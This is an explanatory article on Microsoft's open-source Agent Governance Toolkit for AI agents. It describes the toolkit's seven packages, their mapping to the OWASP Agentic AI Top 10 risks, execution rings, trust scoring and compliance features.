On April 2, 2026, Microsoft released the Agent Governance Toolkit โ a seven-package open-source project that provides runtime security governance for autonomous AI agents. The toolkit is available in Python, TypeScript, Rust, Go, and .NET, ships with over 9,500 tests, and addresses all 10 risks in the OWASP Agentic AI Top 10.
The release signals a shift in how the industry thinks about agent security. Rather than treating governance as an afterthought or a compliance checklist, Microsoft is positioning runtime security as infrastructure โ something that should be embedded into agent systems from the start, not bolted on later.
Why Agent Governance Matters Now
The gap between building AI agents and governing them has widened dramatically. Modern agent frameworks like LangChain, CrewAI, AutoGen, and the Claude Agent SDK make it straightforward to create agents that can browse the web, execute code, manage files, and interact with external APIs. But almost none of them ship with built-in governance primitives.
This creates a specific class of risk: agents that work correctly in development but behave unpredictably in production. An agent that can execute shell commands can also delete databases. An agent that can call APIs can also exfiltrate data. An agent that delegates tasks to sub-agents can create uncontrolled chains of autonomous behavior.
The OWASP Agentic AI Top 10, published in early 2026, formalized these risks into categories:
| # | OWASP Risk | Description | Toolkit Package |
|---|---|---|---|
| 1 | Excessive Agency | Agent acts beyond intended scope | Agent OS |
| 2 | Insecure Tool Use | Unvalidated tool invocations | Agent OS, Agent Runtime |
| 3 | Prompt Injection | Adversarial input manipulation | Agent OS |
| 4 | Insufficient Monitoring | Blind spots in agent behavior | Agent SRE |
| 5 | Unsafe Output Handling | Unvalidated agent responses | Agent Runtime |
| 6 | Supply Chain Vulnerabilities | Untrusted plugins and tools | Agent Marketplace |
| 7 | Excessive Permissions | Over-privileged agent access | Agent Runtime |
| 8 | Data Leakage | Uncontrolled data exfiltration | Agent OS, Agent Mesh |
| 9 | Lack of Accountability | No audit trail for actions | Agent Compliance |
| 10 | Trust Boundary Violations | Cross-agent trust issues | Agent Mesh |
Microsoft's toolkit is the first major open-source project to systematically address all ten.
Toolkit Architecture Overview
The seven packages form a layered governance stack that wraps around any existing agent framework:
The Seven Packages
The toolkit is organized into seven focused packages, each addressing a specific governance domain.
Agent OS โ Policy Engine
Agent OS is a stateless policy engine that intercepts agent actions and evaluates them against configurable policies. It operates at sub-millisecond latency (less than 0.1ms at p99), making it practical to insert into the hot path of every agent action without measurable performance impact.
The engine supports three policy languages:
| Policy Language | Best For | Complexity |
|---|---|---|
| YAML Rules | Simple allow/deny patterns | Low |
| OPA Rego | Complex conditional logic | Medium |
| Cedar | Attribute-based access control | High |
Teams can mix policy languages within the same deployment, using simple YAML rules for common cases and Rego or Cedar for nuanced authorization decisions.
Agent Mesh โ Cryptographic Identity
Agent Mesh provides cryptographic identity for agents using decentralized identifiers (DIDs) with Ed25519 key pairs. Each agent gets a verifiable identity, and the system maintains a dynamic trust score on a 0โ1000 scale that adjusts based on agent behavior.
The trust lifecycle works as follows:
An agent whose actions consistently pass policy checks accumulates trust; one that triggers policy violations sees its score degrade. Other agents can query trust scores before accepting delegated work.
Agent Runtime โ Execution Rings
Agent Runtime implements execution rings modeled on CPU privilege levels:
| Ring | Privilege Level | Agent Type | Allowed Actions |
|---|---|---|---|
| Ring 0 | Full Access | System orchestrators | All system resources |
| Ring 1 | Elevated | Trusted agents | Network, file system, APIs |
| Ring 2 | Standard | Regular agents | Scoped tools, sandboxed execution |
| Ring 3 | Restricted | Untrusted / new agents | Read-only, no network, no file writes |
Just as an OS kernel runs at Ring 0 with full hardware access while user programs run at Ring 3 with restricted access, agents are assigned execution rings that determine what system resources they can access.
The runtime includes saga orchestration for complex multi-step agent workflows and emergency kill switches for immediate termination of runaway agents.
Agent SRE โ Production Reliability
Agent SRE applies site reliability engineering practices to agent systems:
- SLO Definitions โ Service Level Objectives specific to agent workloads (e.g., "95% of tool calls complete within 5s")
- Error Budgets โ Track agent reliability over rolling windows; auto-disable capabilities when budgets exhaust
- Circuit Breakers โ Automatically disable failing agent capabilities after configurable failure thresholds
- Chaos Engineering โ Inject faults (latency, errors, resource exhaustion) to test agent resilience
Agent Compliance โ Regulatory Mapping
Agent Compliance provides automated governance verification that maps agent behavior to regulatory frameworks:
| Framework | Coverage | Key Requirements |
|---|---|---|
| EU AI Act | Risk classification, transparency | Mandatory for EU-deployed agents |
| HIPAA | Data access logging, encryption | Required for health data agents |
| SOC2 | Access control, monitoring | Enterprise compliance baseline |
Rather than requiring manual compliance audits, the system continuously evaluates agent actions against regulatory requirements and generates compliance reports.
Agent Marketplace โ Plugin Lifecycle
Agent Marketplace manages the lifecycle of agent plugins and tools with manifest verification. It ensures that tools loaded by agents come from verified sources and haven't been tampered with โ addressing the supply chain risk that the OWASP framework identified.
Agent Lightning โ Training Governance
Agent Lightning provides governance guardrails for reinforcement learning workflows used to train agent behavior. It ensures that training processes respect the same policy constraints that production agents operate under.
Integration Without Rewrites
A key design decision is that the toolkit integrates with existing agent frameworks without requiring rewrites. The integration flow is straightforward:
Teams using LangChain, CrewAI, AutoGen, Azure AI Foundry, or Google ADK can add governance layers to their existing agents by wrapping tool calls and agent actions with the toolkit's policy engine.
This matters because governance adoption typically fails when it requires architecture changes. By operating as middleware โ intercepting actions rather than replacing frameworks โ the toolkit reduces the barrier to adoption from "rewrite your agent system" to "add a policy layer."
Toolkit at a Glance
| Dimension | Details |
|---|---|
| License | MIT |
| Languages | Python, TypeScript, Rust, Go, .NET |
| Test Coverage | 9,500+ tests |
| OWASP Coverage | 10/10 Agentic AI Top 10 risks |
| Latency Impact | < 0.1ms p99 (Agent OS policy checks) |
| Compatible Frameworks | LangChain, CrewAI, AutoGen, Azure AI Foundry, Google ADK |
| Policy Languages | YAML, OPA Rego, Cedar |
| Future Governance | Planned move to open foundation |
What This Means for Agent Builders
For teams building production agent systems, the toolkit provides three immediately useful capabilities:
Deterministic policy enforcement โ Agent actions are evaluated against explicit policies before execution, not just monitored after the fact. This is the difference between a guardrail and a dashcam.
Agent identity and trust โ Multi-agent systems get cryptographic identity and dynamic trust scoring, enabling principled delegation decisions rather than implicit trust between agents.
Compliance automation โ Regulatory mapping runs continuously rather than as a periodic manual audit, catching compliance drift as agent behavior evolves.
The toolkit is released under the MIT license, with Microsoft planning to move it to a foundation for community governance.